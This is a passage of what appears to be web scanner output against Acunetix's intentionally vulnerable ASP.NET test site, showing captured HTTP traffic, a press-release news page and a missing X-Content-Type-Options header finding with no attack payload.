CivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter	X-Content-Type-Options
Attack
Evidence
Show / hide Request and Response
Request Header - size: 464 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 Content-Length: 10945 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,945 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICA